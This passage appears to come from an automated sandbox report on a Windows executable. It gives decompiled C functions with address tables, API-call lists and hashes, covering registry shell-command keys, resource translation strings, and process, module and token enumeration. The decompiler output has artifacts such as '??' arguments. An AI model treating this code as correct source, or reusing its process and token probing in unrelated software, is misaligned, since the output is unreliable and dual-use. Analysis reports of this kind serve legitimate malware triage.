				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                                                                  0x00404415
                                                                                                                                                                  0x0040441d
                                                                                                                                                                  0x0040442c
                                                                                                                                                                  0x00404435
                                                                                                                                                                  0x004045b3
                                                                                                                                                                  0x004045b7
                                                                                                                                                                  0x004045b7
                                                                                                                                                                  0x0040444b
                                                                                                                                                                  0x00404452
                                                                                                                                                                  0x00404457
                                                                                                                                                                  0x00404460
                                                                                                                                                                  0x00404461
                                                                                                                                                                  0x00404462
                                                                                                                                                                  0x0040446d
                                                                                                                                                                  0x00404472
                                                                                                                                                                  0x00404473
                                                                                                                                                                  0x00404490
                                                                                                                                                                  0x004044a5
                                                                                                                                                                  0x004044b4
                                                                                                                                                                  0x004044b6
                                                                                                                                                                  0x004044b7
                                                                                                                                                                  0x004044bd
                                                                                                                                                                  0x004044cf
                                                                                                                                                                  0x004044db
                                                                                                                                                                  0x004044eb
                                                                                                                                                                  0x004044f1
                                                                                                                                                                  0x004044f6
                                                                                                                                                                  0x004044f9
                                                                                                                                                                  0x004044fe
                                                                                                                                                                  0x00404506
                                                                                                                                                                  0x00404507
                                                                                                                                                                  0x00404508
                                                                                                                                                                  0x00404510
                                                                                                                                                                  0x00404521
                                                                                                                                                                  0x00404532
                                                                                                                                                                  0x00404539
                                                                                                                                                                  0x00404547
                                                                                                                                                                  0x0040454e
                                                                                                                                                                  0x0040455b
                                                                                                                                                                  0x0040455c
                                                                                                                                                                  0x00404564
                                                                                                                                                                  0x0040456f
                                                                                                                                                                  0x00404570
                                                                                                                                                                  0x00404571
                                                                                                                                                                  0x0040457c
                                                                                                                                                                  0x0040457d
                                                                                                                                                                  0x00404588
                                                                                                                                                                  0x00404589
                                                                                                                                                                  0x0040458a
                                                                                                                                                                  0x004045a0
                                                                                                                                                                  0x004045a5
                                                                                                                                                                  0x00404521
                                                                                                                                                                  0x004044eb
                                                                                                                                                                  0x004045ab
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00404452
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00404473
                                                                                                                                                                    • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                                                                    • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                                                                    • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                                                                  • memset.MSVCRT ref: 004044CF
                                                                                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                                                                  • memset.MSVCRT ref: 00404539
                                                                                                                                                                  • memset.MSVCRT ref: 0040454E
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00404571
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                                                                    • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                                                                  • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                                                                  • API String ID: 486436031-734527199
                                                                                                                                                                  • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                  • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                  • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                                                                  0x00406466
                                                                                                                                                                  0x0040647d
                                                                                                                                                                  0x00406484
                                                                                                                                                                  0x00406499
                                                                                                                                                                  0x004064a0
                                                                                                                                                                  0x004064af
                                                                                                                                                                  0x004064b4
                                                                                                                                                                  0x004064bb
                                                                                                                                                                  0x004064cd
                                                                                                                                                                  0x004064d2
                                                                                                                                                                  0x004064d4
                                                                                                                                                                  0x004064e4
                                                                                                                                                                  0x004064ea
                                                                                                                                                                  0x004064ea
                                                                                                                                                                  0x004064f3
                                                                                                                                                                  0x00406503
                                                                                                                                                                  0x00406514
                                                                                                                                                                  0x00406525
                                                                                                                                                                  0x0040653b
                                                                                                                                                                  0x0040654e
                                                                                                                                                                  0x00406568
                                                                                                                                                                  0x00406572
                                                                                                                                                                  0x0040657a
                                                                                                                                                                  0x00406582
                                                                                                                                                                  0x0040658a
                                                                                                                                                                  0x00406596

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00406484
                                                                                                                                                                  • memset.MSVCRT ref: 004064A0
                                                                                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                    • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                    • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                    • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004064E4
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004064F3
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00406503
                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040657A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                                  • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                  • API String ID: 3037099051-2314623505
                                                                                                                                                                  • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                  • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                                                                  • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                  • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                                  			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                                                                                  0x00409ab0
                                                                                                                                                                  0x00409ab7
                                                                                                                                                                  0x00409ac8
                                                                                                                                                                  0x00409acf
                                                                                                                                                                  0x00409ad4
                                                                                                                                                                  0x00409ae0
                                                                                                                                                                  0x00409ae6
                                                                                                                                                                  0x00409ae8
                                                                                                                                                                  0x00409af0
                                                                                                                                                                  0x00409c3a
                                                                                                                                                                  0x00409c41
                                                                                                                                                                  0x00409c67
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c67
                                                                                                                                                                  0x00409c49
                                                                                                                                                                  0x00409c50
                                                                                                                                                                  0x00409c51
                                                                                                                                                                  0x00409c56
                                                                                                                                                                  0x00409c57
                                                                                                                                                                  0x00409c5a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c64
                                                                                                                                                                  0x00409b00
                                                                                                                                                                  0x00409b03
                                                                                                                                                                  0x00409b06
                                                                                                                                                                  0x00409b0b
                                                                                                                                                                  0x00409b10
                                                                                                                                                                  0x00409ba9
                                                                                                                                                                  0x00409bac
                                                                                                                                                                  0x00409bc1
                                                                                                                                                                  0x00409bc7
                                                                                                                                                                  0x00409bcc
                                                                                                                                                                  0x00409bd8
                                                                                                                                                                  0x00409bf0
                                                                                                                                                                  0x00409bf2
                                                                                                                                                                  0x00409c23
                                                                                                                                                                  0x00409c26
                                                                                                                                                                  0x00409c2f
                                                                                                                                                                  0x00409c34
                                                                                                                                                                  0x00409c34
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c2f
                                                                                                                                                                  0x00409bf7
                                                                                                                                                                  0x00409bfb
                                                                                                                                                                  0x00409c02
                                                                                                                                                                  0x00409c06
                                                                                                                                                                  0x00409c0d
                                                                                                                                                                  0x00409c14
                                                                                                                                                                  0x00409c17
                                                                                                                                                                  0x00409c18
                                                                                                                                                                  0x00409c1b
                                                                                                                                                                  0x00409c1e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c1e
                                                                                                                                                                  0x00409b1f
                                                                                                                                                                  0x00409b25
                                                                                                                                                                  0x00409b2a
                                                                                                                                                                  0x00409b2d
                                                                                                                                                                  0x00409b33
                                                                                                                                                                  0x00409b3d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409b4b
                                                                                                                                                                  0x00409b53
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409b6a
                                                                                                                                                                  0x00409b6c
                                                                                                                                                                  0x00409b6e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409b77
                                                                                                                                                                  0x00409b7b
                                                                                                                                                                  0x00409b82
                                                                                                                                                                  0x00409b86
                                                                                                                                                                  0x00409b8d
                                                                                                                                                                  0x00409b8e
                                                                                                                                                                  0x00409b94
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00409AB7
                                                                                                                                                                  • memset.MSVCRT ref: 00409ACF
                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken,00000000,00000000,00408FE6,00000000), ref: 00408FA8
                                                                                                                                                                  • memset.MSVCRT ref: 00409B25
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetTokenInformation,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409B4B
                                                                                                                                                                  • memset.MSVCRT ref: 00409BC7
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                                                                  • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                                                                  • API String ID: 3504373036-27875219
                                                                                                                                                                  • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                                                                  • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                                                                  • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                                                                  • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                                                                                  0x00409179
                                                                                                                                                                  0x00409209
                                                                                                                                                                  0x00409209
                                                                                                                                                                  0x00409185
                                                                                                                                                                  0x0040918a
                                                                                                                                                                  0x0040918f
                                                                                                                                                                  0x00409208
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409191
                                                                                                                                                                  0x0040919e
                                                                                                                                                                  0x004091a2
                                                                                                                                                                  0x004091a7
                                                                                                                                                                  0x004091af
                                                                                                                                                                  0x004091b3
                                                                                                                                                                  0x004091b8
                                                                                                                                                                  0x004091c0
                                                                                                                                                                  0x004091c4
                                                                                                                                                                  0x004091c9
                                                                                                                                                                  0x004091d1
                                                                                                                                                                  0x004091d5
                                                                                                                                                                  0x004091da
                                                                                                                                                                  0x004091e2
                                                                                                                                                                  0x004091e6
                                                                                                                                                                  0x004091eb
                                                                                                                                                                  0x004091ed
                                                                                                                                                                  0x004091ed
                                                                                                                                                                  0x004091eb
                                                                                                                                                                  0x004091da
                                                                                                                                                                  0x004091c9
                                                                                                                                                                  0x004091b8
                                                                                                                                                                  0x004091ff
                                                                                                                                                                  0x00409202
                                                                                                                                                                  0x00409202
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004091ff

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,75145B60,?,00408C98), ref: 0040919E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                  • API String ID: 1182944575-70141382
                                                                                                                                                                  • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                                                                  • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                                                                  • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                                                                  • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                                                                  0x004090f5
                                                                                                                                                                  0x00409171
                                                                                                                                                                  0x00409171
                                                                                                                                                                  0x004090fd
                                                                                                                                                                  0x00409103
                                                                                                                                                                  0x00409107
                                                                                                                                                                  0x00409170
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409170
                                                                                                                                                                  0x00409116
                                                                                                                                                                  0x0040911a
                                                                                                                                                                  0x0040911f
                                                                                                                                                                  0x00409127
                                                                                                                                                                  0x0040912b
                                                                                                                                                                  0x00409130
                                                                                                                                                                  0x00409138
                                                                                                                                                                  0x0040913c
                                                                                                                                                                  0x00409141
                                                                                                                                                                  0x00409149
                                                                                                                                                                  0x0040914d
                                                                                                                                                                  0x00409152
                                                                                                                                                                  0x0040915a
                                                                                                                                                                  0x0040915e
                                                                                                                                                                  0x00409163
                                                                                                                                                                  0x00409165
                                                                                                                                                                  0x00409165
                                                                                                                                                                  0x00409163
                                                                                                                                                                  0x00409152
                                                                                                                                                                  0x00409141
                                                                                                                                                                  0x00409130
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,75145B60), ref: 00409116
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                                                                  • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                                                                  • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                                                                  • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                                                                  • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                  			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                                                                  0x00409faf
                                                                                                                                                                  0x00409fb4
